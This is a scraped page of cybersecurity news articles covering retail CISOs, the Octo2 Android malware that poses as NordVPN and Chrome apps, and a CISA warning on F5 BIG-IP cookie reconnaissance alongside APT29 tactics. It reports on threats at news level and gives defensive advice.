"We knew how to data warehouse, and it's got business value — even more now with the development of GenAI," he says. "I think all of those things have kind of started to come together at this point, allowing the retail CISO to really have a leg to stand on. Now they just also have kind of the business knowledge, because they're being brought into more of these conversations at this point."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Retail CISOs Take on More Risk to Foster Innovation

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This…

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This advanced trojan uses sophisticated techniques to evade detection, steal credentials, and enable remote access to infected devices.

Cybersecurity researchers at DomainTools have released their new research on Octo2, a new version of the notorious Octo malware family. Octo2 targets Android mobile devices and based on its activity, researchers believe that it will target users globally soon.

According to Steve Behm, Solutions Engineer at DomainTools, Octo2 represents a major change in cybersecurity threats. This updated version of the prolific Octo (ExobotCompact) family spreads rapidly due to its enhanced features, global adoption of its predecessor, and aggressive distribution tactics. 

Octo2 features improved remote access trojan capabilities, ensuring reliable communication and control over infected devices even in challenging network conditions. Moreover, its enhanced Anti-Analysis and Anti-Detection techniques can hinder security analysis and detection, making it more difficult to identify and neutralize the threat.

In addition, the use of DGA-Based C2 server generation algorithm (DGA) to create dynamic command and control (C2) server addresses adds a layer of complexity, making it harder for security systems to track and disrupt communication.

“We were eventually able to expand the original 9 domains and 7 TLDs to 269 domains and 12 TLDs first seen from August 22nd, 2024 to October 4th, 2024,” reads DomainTool’s **blog post** shared with Hackread.com ahead of publishing on October 10, 2024.

****Currently Targeting Europe****

Early samples of Octo2 have been observed in several European countries, including Italy, Poland, Moldova, and Hungary. However, given the global reach of the original Octo and the improvements in Octo2, its distribution is expected to expand rapidly. 

****Attack Pattern** – Disguised as VPN and Browser**

The malware often disguises itself as legitimate applications, such as Google Chrome, NordVPN, or “Enterprise Europe Network,” to deceive unsuspecting users. It employs a dropper called **Zombinder** to deliver the malicious payload, prompting users to install a seemingly harmless plugin that is actually Octo2.   

For your information, Zombinder is another Android malware that was actively sold on the dark web in 2022. Its developers also offered a Windows version. At that time, Zombinder was found distributing the notorious **Xenomorph banking malware**, disguised as the VidMate app.

Once a device gets infected, Octo2 allows remote access to mobile devices, intercepting push notifications, harvesting credentials, and performing unauthorized actions, such as allowing for unauthorized login and access. The **Conficker worm discovered in 2008** is one of the earliest examples of a DGA used by malware families and so far 50 malware families, including Zeus and Dyre, have been identified to be using DGA domains.

****Abusing Domain Generation Algorithms****

Octo2’s use of a DGA (Domain Generation Algorithms – Different from **Registered Domain Generation Algorithms – RDGAs**) to generate its C2 server address is a significant enhancement. This technique allows the malware to constantly change its communication endpoints, making it more resilient to takedowns and detection efforts. While researchers can identify the patterns used to generate these domains, the dynamic nature of the C2 infrastructure presents a massive threat.  

Domain Tools researchers warn users to be cautious of Octo2 malware and avoid downloading apps or software from third-party sites. For businesses, using **threat intelligence** is important. This includes advanced detection tools like sandboxing, monitoring DNS traffic for unusual activity, and using endpoint security solutions to spot malicious behaviour on infected devices. Regular DNS traffic monitoring can also help detect DGA-based malware.

1.  **Android Malware Ajina.Banker Steals 2FA Codesvia Telegram**
2.  **BingoMod Android Malware Posing as Security Apps, Wipes Data**
3.  **SMS Stealer Targeting Android Users via Malicious Apps and Ads**
4.  **Phishing Attacks Target European Bank Users on iOS and Android**
5.  **Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos**

Octo2 Malware Uses Fake NordVPN, Chrome Apps to Infect Android Devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.
It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who

Vulnerability / Network Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.

It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who is behind the activity, or what the end goals of the campaign are.

"A malicious cyber actor could leverage the information gathered from unencrypted persistence cookies to infer or identify additional network resources and potentially exploit vulnerabilities found in other devices present on the network," CISA said in an advisory.

It has also recommended organizations encrypt persistent cookies employed in F5 BIG-IP devices by configuring cookie encryption within the HTTP profile. Furthermore, it's urging users to verify the protection of their systems by running a diagnostic utility provided by F5 called BIG-IP iHealth to identify potential issues.

"The BIG-IP iHealth Diagnostics component of the BIG-IP iHealth system evaluates the logs, command output, and configuration of your BIG-IP system against a database of known issues, common mistakes, and published F5 best practices," F5 notes in a support document.

"The prioritized results provide tailored feedback about configuration issues or code defects and provide a description of the issue, \[and\] recommendations for resolution."

The disclosure comes as cybersecurity agencies from the U.K. and the U.S. have published a joint bulletin detailing Russian state-sponsored actors' attempts to target diplomatic, defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations.

The activity has been attributed to a threat actor tracked as APT29, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, and Midnight Blizzard. APT29 is understood to be a key cog in the Russian military intelligence machine and is affiliated with the Foreign Intelligence Service (SVR).

"SVR cyber intrusions include a heavy focus on remaining anonymous and undetected. The actors use TOR extensively throughout intrusions – from initial targeting to data collection – and across network infrastructure," the agencies said.

"The actors lease operational infrastructure using a variety of fake identities and low reputation email accounts. The SVR obtains infrastructure from resellers of major hosting providers."

Attacks mounted by APT29 have been categorized as those designed to harvest intelligence and establish persistent access so as to facilitate supply chain compromises (i.e., targets of intent), as well as those that allow them to host malicious infrastructure or conduct follow-on operations from compromised accounts by taking advantage of publicly known flaws, weak credentials, or other misconfigurations (i.e., targets of opportunity).

Some of the significant security vulnerabilities highlighted include CVE-2022-27924, a command injection flaw in Zimbra Collaboration, and CVE-2023-42793, a critical authentication bypass bug that allows for remote code execution on TeamCity Server.

APT29 is a relevant example of threat actors continuously innovating their tactics, techniques and procedures in an attempt to stay stealthy and circumvent defenses, even going to the extent of destroying their infrastructure and erasing any evidence should it suspect their intrusions have been detected, either by the victim or law enforcement.

Another notable technique is the extensive use of proxy networks, comprising mobile telephone providers or residential internet services, to interact with victims located in North America and blend in with legitimate traffic.

"To disrupt this activity, organizations should baseline authorized devices and apply additional scrutiny to systems accessing their network resources that do not adhere to the baseline," the agencies said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel